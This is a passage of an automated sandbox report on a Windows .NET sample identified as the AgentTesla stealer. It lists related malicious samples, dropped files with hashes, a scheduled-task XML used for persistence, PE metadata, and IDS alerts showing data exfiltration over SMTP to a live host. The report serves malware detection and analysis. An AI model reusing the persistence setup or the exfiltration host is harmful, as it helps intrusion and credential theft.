                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                NAYATEL-PKNayatelPvtLtdPK1xGvWmAmvc.elfGet hashmaliciousUnknownBrowse
                                • 115.186.147.79
                                28SY8i9x72.elfGet hashmaliciousMiraiBrowse
                                • 115.186.147.68
                                SPO-2344564.exeGet hashmaliciousAgentTeslaBrowse
                                • 203.82.48.116
                                ox0CSfGwkZ.elfGet hashmaliciousMiraiBrowse
                                • 58.65.166.34
                                huhu.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                • 115.186.172.43
                                6G66kSe2A4.elfGet hashmaliciousMiraiBrowse
                                • 115.186.147.23
                                UX1Kgk69dt.elfGet hashmaliciousUnknownBrowse
                                • 115.186.147.71
                                fZZgQUTO36.elfGet hashmaliciousMiraiBrowse
                                • 115.186.172.87
                                oBnUnwroXT.elfGet hashmaliciousMiraiBrowse
                                • 115.186.172.48
                                sora.arm7.elfGet hashmaliciousMiraiBrowse
                                • 115.186.172.37

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\P020241901.exe.log

                                Download File
                                Process:C:\Users\user\Desktop\P020241901.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VKkzqGUhsZwwm.exe.log

                                Download File
                                Process:C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2232
                                Entropy (8bit):5.380747059108785
                                Encrypted:false
                                SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugei/ZPUyus:lGLHxvIIwLgZ2KRHWLOugss
                                MD5:6557859169C38B3271B0895BF83DB40D
                                SHA1:E5D44C6EBB6ABEA6A2E26FE81605C7BF8F903843
                                SHA-256:547BADA37C7E136DFB5EA88928F9BFAF56C50DF2BB1E46628EACB8D1E7CDFD93
                                SHA-512:CCC9D1D601F0F15453ED0EB7B7AEAB3B9B56C048E485E351CBF33FEF2306837019AB5206ED4D84873A35529FB9721BC1B9A222B7EC7EA7EC9DE58831D99EA730
                                Malicious:false
                                Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4gbcp5mo.svp.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kukwo04m.elw.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngjuznog.vlp.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ruetq44x.yc0.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1rydocn.w14.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_stcfywtp.z2r.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tijkny5d.u50.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ysdjgrp2.ove.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\tmpBEA.tmp

                                Download File
                                Process:C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1586
                                Entropy (8bit):5.124429139984825
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgergYrFdOFzOzN33ODOiDdKrsuT3v
                                MD5:D74CF001840614DB5C957E2A1934367F
                                SHA1:023F250939860EF87F40774E615B765C65364A65
                                SHA-256:F1DE5CA103033A002DD48D00DCB9E3ECB30738BD12C7DF1B244A99C4E8092296
                                SHA-512:537BA2C07C10CBAC8382E41DD4A37574A2074542F2F9A9383288AB451766E97E6040322AC6DE2E9D90E4B37679A5F69C65C850FDD7FB7154132FAE02C74FF857
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp

                                Download File
                                Process:C:\Users\user\Desktop\P020241901.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1586
                                Entropy (8bit):5.124429139984825
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgergYrFdOFzOzN33ODOiDdKrsuT3v
                                MD5:D74CF001840614DB5C957E2A1934367F
                                SHA1:023F250939860EF87F40774E615B765C65364A65
                                SHA-256:F1DE5CA103033A002DD48D00DCB9E3ECB30738BD12C7DF1B244A99C4E8092296
                                SHA-512:537BA2C07C10CBAC8382E41DD4A37574A2074542F2F9A9383288AB451766E97E6040322AC6DE2E9D90E4B37679A5F69C65C850FDD7FB7154132FAE02C74FF857
                                Malicious:true
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe

                                Download File
                                Process:C:\Users\user\Desktop\P020241901.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):631296
                                Entropy (8bit):7.9882381176484145
                                Encrypted:false
                                SSDEEP:12288:ripUWpDRbyAAMNPOtta6rE9y4+HQi4ieitahh6j:riaWPbyXMNPOtkIEowi4UtaSj
                                MD5:F061401DD36DC8E88017EF9F9A43E5A7
                                SHA1:EA4D27815A1CF0F447FAB333BDD52825E32807E3
                                SHA-256:935319064E3A30103096A9241C2467B7D19FDBD371D078554A1A7503E1A92CDD
                                SHA-512:91B74C01069A22F00E50C80174BBA8D8D1379D11B51FB09027A18EFD71A465507BA747185F36D670824EAA84B1BB2B49C81B310D04DAFC22B3B5C0A55FEA945A
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 66%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7................0.............f.... ........@.. ....................................@.....................................O....... ...........................p...p............................................ ............... ..H............text...l.... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B................H.......H.......X,...............C...d............................................r...p..'...%..&.(....}......}.....(.......(.....*..0..<.........{....o......{....o.......(.....s......{.....o......o....&*.0..+.........,..{.......+....,...{....o........(.....*..0................(....s......s....}.....s....}.....s....}.....( .....{.... .... ....s!...o".....{....r!..po#.....r1..po$...t.....s%....s%...%.5o&....%.8o&....%.Ho&.....s%...%.8o&....%.5o&......s%...%.4o&....%.Ho&....%.4o&......

                                C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe:Zone.Identifier

                                Download File
                                Process:C:\Users\user\Desktop\P020241901.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:false
                                Preview:[ZoneTransfer]....ZoneId=0

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.9882381176484145
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:P020241901.exe
                                File size:631'296 bytes
                                MD5:f061401dd36dc8e88017ef9f9a43e5a7
                                SHA1:ea4d27815a1cf0f447fab333bdd52825e32807e3
                                SHA256:935319064e3a30103096a9241c2467b7d19fdbd371d078554a1a7503e1a92cdd
                                SHA512:91b74c01069a22f00e50c80174bba8d8d1379d11b51fb09027a18efd71a465507ba747185f36d670824eaa84b1bb2b49c81b310d04dafc22b3b5c0a55fea945a
                                SSDEEP:12288:ripUWpDRbyAAMNPOtta6rE9y4+HQi4ieitahh6j:riaWPbyXMNPOtkIEowi4UtaSj
                                TLSH:EFD4232F36D8A7A1D8B9A7F91F31105123E5E382E088FA690BDA399D36533F50504B97
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7................0.............f.... ........@.. ....................................@................................

                                File Icon

                                Icon Hash:00928e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0x49b566
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x9A0837A8 [Wed Nov 22 01:36:40 2051 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x9b5140x4f.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x9c0000x620.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x9e0000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x9a8700x70.text
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x9956c0x996006fed7369000d8ff95e1a875f99c665f2False0.9883226365118174data7.992542733514758IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc0x9c0000x6200x800f803d6e5bcf7e80b07669ae1dff24843False0.33544921875data3.4494112256368665IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x9e0000xc0x2009f1a6c5140e29d73dc5109cb0f0860fbFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_VERSION0x9c0900x390data0.42105263157894735
                                RT_MANIFEST0x9c4300x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                Imports

                                DLLImport
                                mscoree.dll_CorExeMain

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                03/18/24-14:32:22.806223TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49711587192.168.2.5203.82.48.116
                                03/18/24-14:32:22.806223TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49711587192.168.2.5203.82.48.116
                                03/18/24-14:32:22.806223TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249711587192.168.2.5203.82.48.116
                                03/18/24-14:32:19.942080TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49708587192.168.2.5203.82.48.116
                                03/18/24-14:32:22.806223TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49711587192.168.2.5203.82.48.116
                                03/18/24-14:32:19.942080TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49708587192.168.2.5203.82.48.116
                                03/18/24-14:32:19.942146TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49708587192.168.2.5203.82.48.116
                                03/18/24-14:32:19.942146TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49708587192.168.2.5203.82.48.116
                                03/18/24-14:32:22.806192TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49711587192.168.2.5203.82.48.116
                                03/18/24-14:32:22.806192TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49711587192.168.2.5203.82.48.116
                                03/18/24-14:32:19.942146TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249708587192.168.2.5203.82.48.116
                                03/18/24-14:32:19.942146TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49708587192.168.2.5203.82.48.116

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Mar 18, 2024 14:32:17.089112997 CET49708587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:17.386487007 CET58749708203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:17.386702061 CET49708587192.168.2.5203.82.48.116
